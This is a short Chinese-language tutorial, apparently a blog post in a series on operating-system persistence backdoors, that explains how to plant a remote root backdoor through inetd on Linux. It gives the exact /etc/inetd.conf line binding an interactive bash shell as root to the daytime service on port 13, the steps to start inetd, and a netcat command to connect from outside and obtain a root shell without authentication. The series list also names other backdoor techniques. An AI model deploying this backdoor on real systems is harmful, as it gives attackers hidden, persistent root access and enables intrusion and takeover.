操作系统权限维持(十五)之Linux系统-inetd远程后门
系列文章
操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门
操作系统权限维持(十一)之Linux系统-SSH Wrapper后门
操作系统权限维持(十二)之Linux系统-sudoers利用后门
操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门
操作系统权限维持(十四)之Linux系统- Strace监听SSH来源流量记录密码后门
inetd远程后门
inetd,也叫作“超级服务器”,就是监视一些网络请求的守护进程,其根据网络请求来调用相应的服务进程来处理连接请求。
inetd.conf则是inetd的配置文件。inetd.conf文件告诉inetd监听哪些网络端口,为每个端口启动哪个服务。
位置是/etc/inetd.conf 配置格式:[servicename] [socktype] [proto] [flags] [user] [server_path] [args] 在配置文件下写入以下内容:
daytime stream tcp nowait root /bin/bash bash -i
daytime服务(13端口) 套接字类型 协议类型 不等待 用户组 提供服务的程序
daytime stream tcp nowait root /bin/bash bash -i
首先我们编辑该文件,向文件中写入上诉的命令
vim /etc/inetd.conf
然后我们输入
inetd
启动服务
这样配置好了以后利用以下命令远程连接直接能拿到root用户身份
nc targetIP 13